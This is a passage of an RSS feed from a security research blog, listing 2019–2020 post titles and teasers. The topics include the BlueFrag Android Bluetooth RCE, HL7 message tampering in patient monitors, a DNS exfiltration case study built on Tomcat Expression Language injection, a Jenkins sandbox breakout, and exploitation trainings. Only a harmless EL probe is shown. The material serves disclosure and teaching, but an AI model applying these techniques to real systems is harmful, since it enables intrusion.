      <description>&lt;p&gt;So there was a pandemic, the whole world was under lockdown, and I got a bit depressed.&lt;br&gt;&#xA;I needed something new in my life, so I decided to take my favorite dog out for a walk in the ATT&amp;amp;CK jungle to check out the newly added sub-techniques…&lt;/p&gt;&#xA;&lt;p&gt;If you’re not familiar with ATT&amp;amp;CK and are wondering what this is all about, no worries…&lt;br&gt;&#xA;ATT&amp;amp;CK stands for Adversarial Tactics, Techniques &amp;amp; Common Knowledge.&lt;br&gt;&#xA;It’s a treasure trove of information about real-life offensive tradecraft.&lt;br&gt;&#xA;I like to see it as an open-source encyclopedia of corporate post-exploitation.&lt;br&gt;&#xA;There is a growing community around the project and more info keeps being added to it.&lt;br&gt;&#xA;[Check out &lt;a href=&#34;https://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/using-attck-to-advance-cyber-threat&#34;&gt;this post&lt;/a&gt; by &lt;a href=&#34;https://twitter.com/likethecoins&#34;&gt;@LikeTheCoins&lt;/a&gt; if you want to know more]&lt;/p&gt;</description>
    </item>
    <item>
      <title>Medical Device Security: HL7v2 Injections in Patient Monitors</title>
      <link>https://insinuator.net/2020/04/medical-device-security-hl7v2-injections-in-patient-monitors/</link>
      <pubDate>Thu, 23 Apr 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/04/medical-device-security-hl7v2-injections-in-patient-monitors/</guid>
      <description>&lt;p&gt;Digital networking is already widespread in many areas of life. In the healthcare industry, a clear trend towards networked devices is noticeable, so that the number of high-tech medical devices in hospitals is steadily increasing.&lt;/p&gt;&#xA;&lt;p&gt;In this blog post, we want to elucidate a vulnerability we identified during the security assessment of a patient monitor. The device sends HL7 v2.x messages, such as observation results to HL7 v2.x capable electronic medical record (EMR) systems. A user with malicious intent can tamper these messages. As HL7 v2.x is a common medical communication standard, we also want to present how this kind of vulnerability may be mitigated. The assessment was part of the BSI project ManiMed, which we would like to present in the following section.&lt;/p&gt;</description>
    </item>
    <item>
      <title>CVE-2020-0022 an Android 8.0-9.0 Bluetooth Zero-Click RCE – BlueFrag</title>
      <link>https://insinuator.net/2020/04/cve-2020-0022-an-android-8.0-9.0-bluetooth-zero-click-rce-bluefrag/</link>
      <pubDate>Wed, 22 Apr 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/04/cve-2020-0022-an-android-8.0-9.0-bluetooth-zero-click-rce-bluefrag/</guid>
      <description>&lt;p&gt;Nowadays, Bluetooth is an integral part of mobile devices. Smartphones interconnect with smartwatches and wireless headphones. By default, most devices are configured to accept Bluetooth connections from any&lt;br&gt;&#xA;nearby unauthenticated device. Bluetooth packets are processed by the Bluetooth chip (also called a controller), and then passed to the host (Android, Linux, etc.). Both, the firmware on the chip and the host Bluetooth subsystem, are a target for Remote Code Execution (RCE) attacks.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dog Whisperer Update</title>
      <link>https://insinuator.net/2020/03/dog-whisperer-update/</link>
      <pubDate>Thu, 26 Mar 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/03/dog-whisperer-update/</guid>
      <description>&lt;p&gt;With the current situation, it’s not easy to find the right angle to start this blog post, so I won’t even try… but with Troopers cancelled, my Bloodhound workshop went down the drain, and I didn’t get a chance to meet or catch up with all of you and share my latest BloodHound adventures. So I decided to write a quick post to share all this…&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;Whipsererlogo3.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;As you might have heard, BloodHound 3 was released last month, so I thought it was time to update the &lt;strong&gt;Dog Whisperers Handbook&lt;/strong&gt;.&lt;br&gt;&#xA;It’s basically a quick intro to BloodHound and Cypher, with a lot of links to resources for further learning.&lt;br&gt;&#xA;You can download the latest version &lt;a href=&#34;https://www.ernw.de/download/ERNW_DogWhisperer3.pdf&#34;&gt;here&lt;/a&gt;. Hope you enjoy it.&lt;/p&gt;</description>
    </item>
    <item>
      <title>VMware NSX-T Distributed Firewall can be bypassed by default</title>
      <link>https://insinuator.net/2020/03/vmware-nsx-t-distributed-firewall-can-be-bypassed-by-default/</link>
      <pubDate>Mon, 23 Mar 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/03/vmware-nsx-t-distributed-firewall-can-be-bypassed-by-default/</guid>
      <description>&lt;p&gt;We recently came across an issue when playing around with VMware NSX-T which not anyone might be aware of when getting started with it. Because many of our customers start with transitioning to NSX-T, we want to share this with you. In short, the Distributed Firewall (DFW) of NSX-T can be easily bypassed in the default configuration because it only works effectively if at the same time, the &lt;em&gt;SpoofGuard&lt;/em&gt; feature is enabled on all logical switch ports which is not the case by default.&lt;/p&gt;</description>
    </item>
    <item>
      <title>DNS exfiltration case study</title>
      <link>https://insinuator.net/2020/03/dns-exfiltration-case-study/</link>
      <pubDate>Wed, 04 Mar 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/03/dns-exfiltration-case-study/</guid>
      <description>&lt;p&gt;Lately, we came across a remote code execution in a Tomcat web service by utilizing &lt;a href=&#34;https://docs.oracle.com/javaee/6/tutorial/doc/gjddd.html&#34;&gt;Expression Language&lt;/a&gt;. The vulnerable POST body field expected a number. When sending &lt;code&gt;${1+2}&lt;/code&gt; instead, the web site included a Java error message about a failed conversion to &lt;code&gt;java.lang.Long&lt;/code&gt; from &lt;code&gt;java.lang.String&lt;/code&gt; with value &lt;code&gt;&amp;quot;3&amp;quot;&lt;/code&gt;.&lt;/p&gt;&#xA;&lt;p&gt;From that error message we learned a couple of things:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;The application uses Java&lt;/li&gt;&#xA;&lt;li&gt;We are able to execute EL expressions&lt;/li&gt;&#xA;&lt;li&gt;Output from the EL engine is always returned as &lt;code&gt;String&lt;/code&gt;&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Whenever you are able to execute code within a Java Context, the most interesting part is to check whether we can get a &lt;code&gt;Runtime&lt;/code&gt; object and execute arbitrary OS commands.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS20 Training Teaser: Attack And Defence In AWS: Chaining Vulnerabilities To Go Beyond The OWASP Top 10</title>
      <link>https://insinuator.net/2020/02/troopers20-training-teaser-attack-and-defence-in-aws-chaining-vulnerabilities-to-go-beyond-the-owasp-top-10/</link>
      <pubDate>Thu, 27 Feb 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/02/troopers20-training-teaser-attack-and-defence-in-aws-chaining-vulnerabilities-to-go-beyond-the-owasp-top-10/</guid>
      <description>&lt;p&gt;Attackers are everywhere. They are now on the cloud too! Attacking the most popular cloud provider – AWS, requires the knowledge of how different services are setup, what defences do we need to bypass, what service attributes can be abused, where can information be leaked, how do I escalate privileges, what about monitoring solutions that may be present in the environment and so on! We try to answer these questions in our intense, hands-on scenario driven training on attacking and subsequently defending against the attacks on AWS.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Critical Bluetooth Vulnerability in Android (CVE-2020-0022) – BlueFrag</title>
      <link>https://insinuator.net/2020/02/critical-bluetooth-vulnerability-in-android-cve-2020-0022-bluefrag/</link>
      <pubDate>Thu, 06 Feb 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/02/critical-bluetooth-vulnerability-in-android-cve-2020-0022-bluefrag/</guid>
      <description>&lt;p&gt;On November 3rd, 2019, we have reported a critical vulnerability affecting the Android Bluetooth subsystem. This vulnerability has been assigned &lt;a href=&#34;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0022&#34;&gt;CVE-2020-0022&lt;/a&gt; and was now patched in the &lt;a href=&#34;https://source.android.com/security/bulletin/2020-02-01.html&#34;&gt;latest security patch&lt;/a&gt; from February 2020. The security impact is as follows:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;On Android 8.0 to 9.0, a remote attacker within proximity can silently execute arbitrary code with the privileges of the Bluetooth daemon as long as Bluetooth is enabled. No user interaction is required and only the Bluetooth MAC address of the target devices has to be known. For some devices, the Bluetooth MAC address can be deduced from the WiFi MAC address. This vulnerability can lead to theft of personal data and could potentially be used to spread malware (Short-Distance Worm).&lt;/li&gt;&#xA;&lt;li&gt;On Android 10, this vulnerability is not exploitable for technical reasons and only results in a crash of the Bluetooth daemon.&lt;/li&gt;&#xA;&lt;li&gt;Android versions even older than 8.0 might also be affected but we have not evaluated the impact.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Users are strongly advised to install the latest available security patch from February 2020. If you have no patch available yet or your device is not supported anymore, you can try to mitigate the impact by some generic behavior rules:&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS20 Training Teaser: Hacking Node.js &amp; Electron apps, shells, injections and fun!</title>
      <link>https://insinuator.net/2020/02/troopers20-training-teaser-hacking-node.js-electron-apps-shells-injections-and-fun/</link>
      <pubDate>Thu, 06 Feb 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/02/troopers20-training-teaser-hacking-node.js-electron-apps-shells-injections-and-fun/</guid>
      <description>&lt;p&gt;Did you know that in the ever evolving field of Web and Desktop apps, it turns out these can all now be powered with JavaScript? You read that right: JavaScript is now used to power both web apps (Node.js) as well as Desktop apps (Electron). What could possibly go wrong?&lt;/p&gt;&#xA;&lt;p&gt;So, the burning question is: how does this affect Web and Desktop app security? If you want to find out, come to our training and you will experience this in a 100% hands-on fashion! 🙂&lt;/p&gt;</description>
    </item>
    <item>
      <title>Blackhoodie@Troopers 2020</title>
      <link>https://insinuator.net/2020/01/blackhoodie@troopers-2020/</link>
      <pubDate>Mon, 27 Jan 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/01/blackhoodie@troopers-2020/</guid>
      <description>&lt;p&gt;Once again, we are super excited to announce that Blackhoodie is happening at Troopers 2020. This is the 3rd time that Blackhoodie is joining with Troopers. As always, one of the main motivation for Blackhoodie is bringing more women into reversing and other core security topics. So we would like to see more women apply to the training slots. However, if you are not a woman and still feel really excited about Blackhoodie, you are welcome to apply. The registration is open now.  Please hurry up and make your registration now. We will close the registration once the seats are filled up with enough quality submissions. We do have a very limited number of seats at this training site. So we apologize in advance if we can’t accommodate everyone, even though we wish we could!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Windows Insight: The Windows Telemetry ETW Monitor</title>
      <link>https://insinuator.net/2020/01/windows-insight-the-windows-telemetry-etw-monitor/</link>
      <pubDate>Tue, 14 Jan 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/01/windows-insight-the-windows-telemetry-etw-monitor/</guid>
      <description>&lt;p&gt;The &lt;a href=&#34;https://github.com/ernw/Windows-Insight&#34;&gt;Windows Insight&lt;/a&gt; repository now hosts the &lt;a href=&#34;https://github.com/ernw/Windows-Insight/tree/master/files/wintel_etwmonitor&#34;&gt;Windows Telemetry ETW Monitor&lt;/a&gt; framework. The framework monitors and reports on Windows Telemetry ETW (Event Tracing for Windows) activities – ETW activities for providing data to Windows Telemetry. It consists of two components:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;the Windbg Framework: a set of scripts for monitoring Windows Telemetry ETW activities. The scripts are fed to a running windbg instance, connected to the Windows instance whose Windows Telemetry ETW activities are monitored.&lt;/li&gt;&#xA;&lt;li&gt;the Telemetry Information Visualization (TIV) framework for visualization of information and statistics. The TIV framework is a set of Python scripts that visualize information and statistics based on the data produced by the Windbg Framework. The output of the TIV framework is a report in the form of a web page.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://insinuator.net/2020/01/windows-insight-the-windows-telemetry-etw-monitor/wintel/&#34;&gt;&lt;img src=&#34;wintel-1024x575.png&#34; alt=&#34;wintel&#34;&gt;&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS20 Training Teaser: TLS in the Enterprise – Post Quantum Security</title>
      <link>https://insinuator.net/2019/12/troopers20-training-teaser-tls-in-the-enterprise-post-quantum-security/</link>
      <pubDate>Mon, 09 Dec 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/12/troopers20-training-teaser-tls-in-the-enterprise-post-quantum-security/</guid>
      <description>&lt;p&gt;Our workshop “TLS in the enterprise” was held for the first time at Troopers 2018 and was our special contribution to the IT Security world to increase the usage of TLS and point out the pitfalls, when switching to TLS.&lt;/p&gt;&#xA;&lt;p&gt;But time is changing and TLS is a kind of standard nowadays, at least when looking at HTTPS, but there are still a lot of things to do regarding other protocols like&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS20 Training Teaser: Swim with the whales – Docker, DevOps &amp;amp; Security in Enterprise Environments</title>
      <link>https://insinuator.net/2019/12/troopers20-training-teaser-swim-with-the-whales-docker-devops-amp-security-in-enterprise-environments/</link>
      <pubDate>Mon, 02 Dec 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/12/troopers20-training-teaser-swim-with-the-whales-docker-devops-amp-security-in-enterprise-environments/</guid>
      <description>&lt;p&gt;Containerization dominates the market nowadays. Fancy buzzwords like continuous integration/deployment/delivery, microservices, containers, DevOps are floating around, but what do they mean? What benefits do they offer compared to the old dogmas? You’re gonna find out in our training!&lt;/p&gt;&#xA;&lt;p&gt;We are going to start with the basics of Docker, Containers and DevOps, but soon you’ll end up with your own applications running inside containers with the images residing in your own registry. Of course, following the microservices approach, and the second day hasn’t even started.After the fundamental topics of containerization are understood, you’re going to create and operate your own Kubernetes cluster. A lot of fun and challenging exercises lie ahead, to give you hands-on experience with all the technologies.&lt;/p&gt;</description>
    </item>
    <item>
      <title>BASTA! Autumn 2019 – Security in DevOps</title>
      <link>https://insinuator.net/2019/11/basta-autumn-2019-security-in-devops/</link>
      <pubDate>Thu, 28 Nov 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/11/basta-autumn-2019-security-in-devops/</guid>
      <description>&lt;p&gt;Some time ago I had the pleasure to speak at the &lt;a href=&#34;https://basta.net/&#34;&gt;BASTA!&lt;/a&gt; Autumn 2019 conference. There, I promised to publish my &lt;a href=&#34;https://insinuator.net/wp-content/uploads/2019/11/201909_BASTA_DevOps-Sc_v1.0.pdf&#34;&gt;slides&lt;/a&gt; such that they can be used as a reference for developers and security guys like me. And with this blog post I would like to hold up to my promise.&lt;/p&gt;&#xA;&lt;p&gt;Overall, the talk was about the challenges of “How to bring security into modern DevOps processes”. Hence, I demonstrated how security can be integrated more or less seamlessly into the modern agile software development workflow. I proposed some risk-depended recommendations about which measurements should be established, for example, within the CI pipeline.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS20 teaser: Hacking mobile apps</title>
      <link>https://insinuator.net/2019/11/troopers20-teaser-hacking-mobile-apps/</link>
      <pubDate>Thu, 28 Nov 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/11/troopers20-teaser-hacking-mobile-apps/</guid>
      <description>&lt;p&gt;“If it’s a thing, then there’s an app for it!”…We trust mobile apps to process our bank transactions, handle our private data and set us up on romantic dates. However, few of us care to wonder,”How (in)secure can these apps be?” Well… at Troopers 20, you can learn how to answer this question yourself!&lt;/p&gt;&#xA;&lt;p&gt;In our 2 day long “Hacking mobile apps” workshop, we teach how to find security vulnerabilities in mobile apps, exploit them and defend against them. We start from scratch, therefore no prior experience in hacking or developing mobile apps is required. Whether you want to learn how to pentest mobile apps, you are an app developer that fancies to secure his/her apps, or just curios, our workshop is a jumpstart to your goal.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS20 Training Teaser: Insight Into Windows Internals</title>
      <link>https://insinuator.net/2019/11/troopers20-training-teaser-insight-into-windows-internals/</link>
      <pubDate>Mon, 25 Nov 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/11/troopers20-training-teaser-insight-into-windows-internals/</guid>
      <description>&lt;p&gt;Windows 10 is one of the most commonly deployed operating systems at this time. Knowledge about its components and internal working principles is highly beneficial. Among other things, such a knowledge enables:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;in-depth studies of undocumented, or poorly documented, system functionalities;&lt;/li&gt;&#xA;&lt;li&gt;development of performant and compatible software to monitor or extend the activities of the operating system itself; and&lt;/li&gt;&#xA;&lt;li&gt;analysis of security-related issues, such as persistent malware.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;The “Insight into Windows Internals” training offered at TROOPERS20 delivers knowledge on the core components and inner working principles of Windows 10. For example, the training provides knowledge on how Windows 10 uses virtualization to isolate security-critical functionalities from attackers that have managed to compromise the system. The training includes a variety of practical exercises allowing attendees to observe first-hand the operation of Windows 10.&lt;/p&gt;</description>
    </item>
    <item>
      <title>DevSecCon19 London – How to Secure OpenShift Environments and What Happens If You Don´t</title>
      <link>https://insinuator.net/2019/11/devseccon19-london-how-to-secure-openshift-environments-and-what-happens-if-you-dont/</link>
      <pubDate>Tue, 19 Nov 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/11/devseccon19-london-how-to-secure-openshift-environments-and-what-happens-if-you-dont/</guid>
      <description>&lt;p&gt;This week I was at &lt;a href=&#34;https://www.devseccon.com/london-2019/&#34;&gt;DevSecCon in London&lt;/a&gt; to present my current research on Red Hat OpenShift. In this talk, I gave a brief introduction to OpenShift, demonstrated some threats that exist for such environments, and dived into different configuration issues that may affect the security of OpenShift environments. The implications of misconfigurations of such an environment have been shown in live demos.&lt;/p&gt;&#xA;&lt;p&gt;You can find the slides for my talk here.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS20 Training Teaser: Hacking 101</title>
      <link>https://insinuator.net/2019/11/troopers20-training-teaser-hacking-101/</link>
      <pubDate>Thu, 07 Nov 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/11/troopers20-training-teaser-hacking-101/</guid>
      <description>&lt;p&gt;Hi there,&lt;br&gt;&#xA;like in recent years the popular &lt;a href=&#34;https://www.troopers.de/troopers20/trainings/3crqx8/&#34;&gt;Hacking 101 workshop&lt;/a&gt; will take place on TROOPERS20, too! The workshop will give you an insight into the &lt;strong&gt;hacking techniques&lt;/strong&gt; required for &lt;strong&gt;penetration testing&lt;/strong&gt;. These techniques will cover various topics:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Information gathering&lt;/li&gt;&#xA;&lt;li&gt;Network scanning&lt;/li&gt;&#xA;&lt;li&gt;Web application hacking&lt;/li&gt;&#xA;&lt;li&gt;Low-level exploitation&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;…and more!&lt;/p&gt;&#xA;&lt;p&gt;During this workshop &lt;strong&gt;you will learn&lt;/strong&gt;, step by step, a &lt;strong&gt;testing methodology&lt;/strong&gt; that applies to the majority of scenarios. So imagine you have to &lt;strong&gt;assess&lt;/strong&gt; the &lt;strong&gt;security of a system&lt;/strong&gt; running on the Internet. How would you start? First, you need a good understanding of the target, including running services or related systems. Just &lt;strong&gt;scanning&lt;/strong&gt; the target’s IP address will most likely not reveal all relevant information you can get. In the information gathering step, you will learn where you could find more relevant information than just a list of open ports. A brief understanding of the target and it’s related systems/services/applications will make scanning and &lt;strong&gt;identifying vulnerabilities&lt;/strong&gt; a lot easier and more effective. Then, the last step will be the &lt;strong&gt;exploitation&lt;/strong&gt; of the identified vulnerabilities, with the ultimate aim to &lt;strong&gt;get access to the target system&lt;/strong&gt; and pivot to other, probably internal, systems and resources.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS20 Training Teaser: Windows &amp; Linux Binary Exploitation</title>
      <link>https://insinuator.net/2019/11/troopers20-training-teaser-windows-linux-binary-exploitation/</link>
      <pubDate>Mon, 04 Nov 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/11/troopers20-training-teaser-windows-linux-binary-exploitation/</guid>
      <description>&lt;p&gt;We are happy to announce that TROOPERS20 will feature the 5th anniversary of the popular Windows &amp;amp; Linux Binary Exploitation workshop!&lt;/p&gt;&#xA;&lt;p&gt;In this workshop, attendees will learn how to exploit those nasty stack-based buffer overflow vulnerabilities by applying the theoretical methods taught in this course to hands-on exercises. Exercises will be performed for real world (32-bit) software such as the Foxit Reader Plugin for Firefox, Wireshark, and nginx.&lt;/p&gt;&#xA;&lt;p&gt;Each exercise will start with an initially uncontrolled overwrite of the instruction pointer register by a stack-based buffer overflow vulnerability. From there on, we will work our way through many obstacles to finally gain remote code execution. Obstacles that will be encountered during the exercises include modern stack-based buffer overflow defense mechanisms such as stack cookies, data execution prevention (DEP), and address space layout randomization (ASLR). For all of these defense mechanisms, attendees will learn and apply certain methods to bypass the protection.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dissection of an Incident – Part 2</title>
      <link>https://insinuator.net/2019/10/dissection-of-an-incident-part-2/</link>
      <pubDate>Wed, 30 Oct 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/10/dissection-of-an-incident-part-2/</guid>
      <description>&lt;p&gt;After our &lt;a href=&#34;https://insinuator.net/2019/07/emotet-at-heise-emotet-there-emotet-everywhere-dissection-of-an-incident/&#34;&gt;last blogpost&lt;/a&gt; regarding Emotet and several other Emotet and Ransomware samples that we encountered, we recently stumbled across a variant belonging to the &lt;em&gt;Gozi&lt;/em&gt;, &lt;em&gt;ISFB&lt;/em&gt;, &lt;em&gt;Dreambot&lt;/em&gt; respectively &lt;em&gt;Ursnif&lt;/em&gt; family. In this blogpost, we want to share our insights from the analysis of this malware, whose malware family is mainly known for being a banking trojan that typically tries to infect browser sessions and sniff/redirect data. In particular, we are going to provide details about the first stage Word Document, the embedded JavaScript/XSL document, an in-depth runtime analysis of the downloaded executable, and some details regarding detection.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Windows Insight: Code integrity and WDAC</title>
      <link>https://insinuator.net/2019/10/windows-insight-code-integrity-and-wdac/</link>
      <pubDate>Wed, 30 Oct 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/10/windows-insight-code-integrity-and-wdac/</guid>
      <description>&lt;p&gt;The &lt;a href=&#34;https://github.com/ernw/Windows-Insight&#34;&gt;Windows Insight&lt;/a&gt; repository now hosts three articles on Windows code integrity and WDAC (Windows Defender Application Control):&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;strong&gt;Device Guard Image Integrity: Architecture Overview&lt;/strong&gt; (&lt;em&gt;Aleksandar Milenkoski&lt;/em&gt;, &lt;em&gt;Dominik Phillips&lt;/em&gt;): In this work, we present the high-level architecture of the code integrity mechanism implemented as part of Windows 10.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Windows Defender Application Control: Initialization&lt;/strong&gt; (&lt;em&gt;Dominik Phillips&lt;/em&gt;, &lt;em&gt;Aleksandar Milenkoski&lt;/em&gt;): This work describes the process for initializing WDAC performed by the Windows loader and the kernel when Windows 10 is booted.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Windows Defender Application Control: Image verification&lt;/strong&gt; (&lt;em&gt;Aleksandar Milenkoski&lt;/em&gt;): This work discusses the workflow of WDAC for verifying images.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;– Aleksandar Milenkoski&lt;/p&gt;</description>
    </item>
    <item>
      <title>Blue Hands On Bloodhound</title>
      <link>https://insinuator.net/2019/10/blue-hands-on-bloodhound/</link>
      <pubDate>Fri, 18 Oct 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/10/blue-hands-on-bloodhound/</guid>
      <description>&lt;p&gt;Hi there,&lt;/p&gt;&#xA;&lt;p&gt;SadProcessor here, happy to be back on the Insinuator to share with you some of my latest BloodHound adventures and experiments…&lt;/p&gt;&#xA;&lt;p&gt;TL;DR Well too bad for you…&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;WorkShop.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;Before diving into a bit of code and some &lt;strong&gt;BloodHound data manipulation&lt;/strong&gt;,&lt;br&gt;&#xA;I would like to thank the BruCon Crew for having me over last week for &lt;strong&gt;BruCON0x0B&lt;/strong&gt;.&lt;br&gt;&#xA;I had the pleasure of delivering a 4h &lt;strong&gt;BloodHound &amp;amp; Cypher workshop&lt;/strong&gt; in the lovely city of Gent [in a fantastic training room], and I am pleased with the interaction &amp;amp; feedback I had with the attendees.&lt;br&gt;&#xA;I was also very happy to see almost as many Blues as Reds in the room [as well as regular security folks!!], all together having a play with BloodHound &amp;amp; Cypher.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Medical Device Security Summit 2019, 19th of November of 2019</title>
      <link>https://insinuator.net/2019/10/medical-device-security-summit-2019-19th-of-november-of-2019/</link>
      <pubDate>Wed, 09 Oct 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/10/medical-device-security-summit-2019-19th-of-november-of-2019/</guid>
      <description>&lt;p&gt;*This event will be held in German*&lt;/p&gt;&#xA;&lt;p&gt;Inspiriert durch die erfolgreichen Round-Table-Diskussionen der TROOPERS-Konferenz freuen wir uns, Ihnen heute mit dem Medical Device Security Summit 2019, eine weitere Veranstaltung in einer Reihe zu Trend-Themen im Bereich der IT-Sicherheit vorzustellen.&lt;/p&gt;&#xA;&lt;p&gt;Die Veranstaltung beginnt am Morgen mit einem Eröffnungsvortrag von Peter Hecko (Leiter der IT-Sicherheit bei HELIOS IT Service GmbH, Podcaster und jahrelanges Mitglied im CCC), gefolgt von Fallstudien und Vorträgen von ERNW Experten und weiteren Referenten aus der Lehre, Industrie und klinischer Praxis.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TelcoSecDay 2020 CFP is open</title>
      <link>https://insinuator.net/2019/09/telcosecday-2020-cfp-is-open/</link>
      <pubDate>Mon, 23 Sep 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/09/telcosecday-2020-cfp-is-open/</guid>
      <description>&lt;p&gt;We are back again with another &lt;a href=&#34;https://troopers.de/troopers20/telco-sec-day/&#34;&gt;TelcoSecDay 2020&lt;/a&gt; (TSD20) which is going to happen on March 16th, 2020 as an additional event to &lt;a href=&#34;https://troopers.de/&#34;&gt;TROOPERS&lt;/a&gt;. This year, it is going to be on &lt;strong&gt;Monday&lt;/strong&gt; of the TROOPERS week. We are delighted to inform that the event is happening for the 9th year in a row. The &lt;a href=&#34;https://cfp.ernw-insight.de/tsd20/cfp&#34;&gt;CFP&lt;/a&gt; is open now. If you have an interesting topic related to the field of Telco Security, please make a submission. The deadline is &lt;strong&gt;November 17, 2019.&lt;/strong&gt; The final notification for TSD submission is December 20, 2019.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Jenkins – Groovy Sandbox breakout (SECURITY-1538 / CVE-2019-10393, CVE-2019-10394, CVE-2019-10399, CVE-2019-10400)</title>
      <link>https://insinuator.net/2019/09/jenkins-groovy-sandbox-breakout-security-1538-/-cve-2019-10393-cve-2019-10394-cve-2019-10399-cve-2019-10400/</link>
      <pubDate>Fri, 20 Sep 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/09/jenkins-groovy-sandbox-breakout-security-1538-/-cve-2019-10393-cve-2019-10394-cve-2019-10399-cve-2019-10400/</guid>
      <description>&lt;p&gt;Recently, I discovered a sandbox breakout in the Groovy Sandbox used by the Jenkins script-security Plugin in their Pipeline Plugin for build scripts. We responsibly disclosed this vulnerability and in the current version of Jenkins it has been fixed and the according &lt;a href=&#34;https://jenkins.io/security/advisory/2019-09-12/&#34;&gt;Jenkins Security Advisory 2019-09-12&lt;/a&gt; has been published. In this blogpost I want to report a bit on the technical details of the vulnerability.&lt;/p&gt;&#xA;&lt;h1 id=&#34;description&#34;&gt;Description&lt;/h1&gt;&#xA;&lt;p&gt;The groovy sandbox transforms some AST nodes of the script to add security checks. For example&lt;/p&gt;</description>
    </item>
    <item>
      <title>PSD2 – Mandatory Account Access for Third Party Providers</title>
      <link>https://insinuator.net/2019/09/psd2-mandatory-account-access-for-third-party-providers/</link>
      <pubDate>Thu, 12 Sep 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/09/psd2-mandatory-account-access-for-third-party-providers/</guid>
      <description>&lt;p&gt;On September 14th the final deadline of complying with the new Payment Service Directive PSD2 will be reached. Among other things, this directive will bring quite a few technical challenges for credit institutions. These include new requirements on two-factor authentication and API access for third parties. In this blog post we will give a short overview of what this means for banks from a security perspective and outline a few of the security-related issues based on what we have been observing during recent assessments of such APIs.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Brief History of the IPv4 Address Space</title>
      <link>https://insinuator.net/2019/08/a-brief-history-of-the-ipv4-address-space/</link>
      <pubDate>Mon, 26 Aug 2019 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2019/08/a-brief-history-of-the-ipv4-address-space/</guid>
      <description>&lt;p&gt;This is meant to be the first part of a 3-part series discussing the space &amp;amp; types of IP addresses, with a particular focus on what has changed between IPv4 and IPv6. In this first post I’ll take the audience through a historical tour of some developments within the IPv4 address space.&lt;/p&gt;&#xA;&lt;p&gt;In a second part I’ll discuss the properties of different types of addresses from a routing and from a security perspective, both in the IPv4 and in the IPv6 space. In the third part we’ll look at the implications of deploying IPv6 in certain networks based on those differences, e.g. “how to handle ACLs and IP address based log analysis approaches in a dual-stack network where systems have one RFC 1918 IPv4 address and multiple IPv6 GUAs?” (for specific reasons the latter two parts might be published on another medium though). In any case let’s start with a brief history of IPv4. The goal here is to understand how we got to the state that we have today.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Black Hat US 2019 / Some Talks</title>
      <link>https://insinuator.net/2019/08/black-hat-us-2019-/-some-talks/</link>
